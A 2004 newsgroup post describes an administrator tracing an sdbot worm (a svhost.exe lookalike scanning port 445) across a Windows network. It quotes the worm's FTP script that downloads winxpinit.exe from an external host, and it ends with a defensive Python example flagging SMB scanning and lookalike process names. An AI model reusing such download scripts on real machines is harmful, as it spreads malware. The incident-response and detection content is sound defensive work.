Re: Mysterious file - WINXPINIT.EXE

From: Jim Tompkins (tompkins_at_oct.net)
Date: 09/14/04

  • Next message: Wayne Brinegar [MSFT]: "RE: Strange internet traffic"
    Date: 14 Sep 2004 09:11:33 -0700
    
    

    I found your post while performing a search on "winxpinit.exe".
    Although I have not found this file on any machines on my network, I
    found (2) batch files on my (previously infected) server that
    referenced winxpinit. I thought you might be interested in this
    information.
     
    Let me step back a little.
     
    Last Friday our network got hit with a virus of some type that was
    preventing web page access to the internet. We could ping outside
    addresses, but could not browse the internet. After tearing down the
    network and isolating the machines I found out that I could access web
    pages when my laptop and the router were segregated from everything
    else. In other words I made an isolated network with my laptop and the
    router using a hub. When I plugged our W2K Server into this network
    web page access went down. I ran Ethereal and captured the packets
    before and after plugging the server into the isolated network. The
    server was sending out tcp packets to random addresses in the
    192.168.x.x ranges. Each of these packets was destined for port 445.
    There were a ton of them. I am not a network guru, but I believe these
    packets were interfering with web access.
     
    After playing around I found out that these packets did not appear
    when the server was not logged on, so I used Remote Task Manager (RTM)
    to take a snapshot of the processes running before and after login.
    I found a process called svhost.exe NOT svchost.exe running. I viewed
    the netstat page in RTM and saw that there were a lot of ports talking
    on the server. In short, killing this process stopped the suspicious
    packets from being transmitted on the isolated network and web page
    access came back again.
     
    I found this same process (system32\svhost.exe) and associated
    registry entries on all the machines in our network that authenticate
    with the W2K server (DC).
    I had someone helping me during all this, and he was insistent on
    putting the network back together and installing Symantec Antivirus
    Corporate on the server and dispatching it to all the machines. We did
    this after I had cleaned the server and only a couple of the other
    machines. During this process the virus (svhost.exe) had propagated
    itself back onto the server and another machine. Symantec did not find
    any virus BTW.
     
    Before calling it quits (it was 1:30am), I cleaned the server again
    (killed the process, deleted the svhost file, and removed registry
    entries) and I unplugged everything from the network. I wanted to see
    if the server would become reinfected by itself. It did not.
     
    On Sunday I individually cleaned each machine and tested them on a hub
    with my laptop for the suspicious packets. During this process I
    copied a few of the virus files to floppy. Once I got the network back
    up I used McAfee Enterprise and scanned the disk I had made. McAfee
    reported that the file had the W32/sdbot.worm.gen.h virus.
     
    After all this I did a search on all the machines for files created
    around the timeframe the network 1st went haywire. On each machine I
    found (3) files: "o", "debug.txt", and "DCPROMO". Each of these files
    was created within a second of the others. The "o" file appears to be a batch
    file, and the debug.txt file has log entries about exploiting various
    IP addresses and transferring svhost.exe.
     
    On the server I found two additional files of interest to you. The 1st
    had no name or extension and had the following commands:
     
    open xxx.xxx.xxx.xxx 12895 (I left out the external IP; it appears
    to be a DSL router, maybe another customer of our ISP)
    user a a
    binary
    GET winxpinit.exe
    bye
     
    The second file had some ftp commands and the following line:
    winxpinit.exe
     
    Let me know if you find anything out about this file.
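Two defender-side checks that follow from the indicators in this post, written as an added example (not part of the original message): a count of how many distinct 192.168.x.x hosts each source tries to reach on TCP 445 (the burst the poster saw in Ethereal), and a near-miss check for process names one edit away from svchost.exe (such as svhost.exe). The "src dst dport" line format, the sample data and the threshold of 20 targets are assumptions.

```python
from collections import defaultdict
from ipaddress import ip_address, ip_network

PRIVATE_RANGE = ip_network("192.168.0.0/16")
SMB_PORT = 445
SCAN_THRESHOLD = 20          # assumed: distinct private targets on 445 before a host is flagged
LEGIT = "svchost.exe"

def count_smb_targets(conn_lines):
    """conn_lines: iterable of 'src dst dport' strings (constructed format).
    Returns {src: number of distinct 192.168.x.x hosts it contacted on 445}."""
    targets = defaultdict(set)
    for line in conn_lines:
        src, dst, dport = line.split()
        if int(dport) == SMB_PORT and ip_address(dst) in PRIVATE_RANGE:
            targets[src].add(dst)
    return {src: len(t) for src, t in targets.items()}

def scanning_hosts(conn_lines, threshold=SCAN_THRESHOLD):
    """Sources that fan out to at least `threshold` private hosts on 445."""
    return sorted(s for s, n in count_smb_targets(conn_lines).items() if n >= threshold)

def edit_distance(a, b):
    """Levenshtein distance, used to catch one-character lookalikes of a system binary."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def lookalike_processes(process_names):
    """Names within one edit of svchost.exe that are not svchost.exe itself."""
    return [n for n in process_names
            if n.lower() != LEGIT and edit_distance(n.lower(), LEGIT) <= 1]

# Constructed sample: one host (the server) probing 25 distinct 192.168.x.x
# addresses on 445, plus two ordinary connections from a workstation.
SAMPLE_CONNS = [f"192.168.1.5 192.168.{i % 7}.{10 + i} 445" for i in range(25)] + [
    "192.168.1.20 192.168.1.5 445",    # workstation mapping a share on the server
    "192.168.1.20 93.184.216.34 80",   # ordinary web traffic
]
SAMPLE_PROCS = ["svchost.exe", "svhost.exe", "explorer.exe", "svchosts.exe"]

if __name__ == "__main__":
    print("fan-out hosts:", scanning_hosts(SAMPLE_CONNS))
    print("lookalikes:", lookalike_processes(SAMPLE_PROCS))
```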

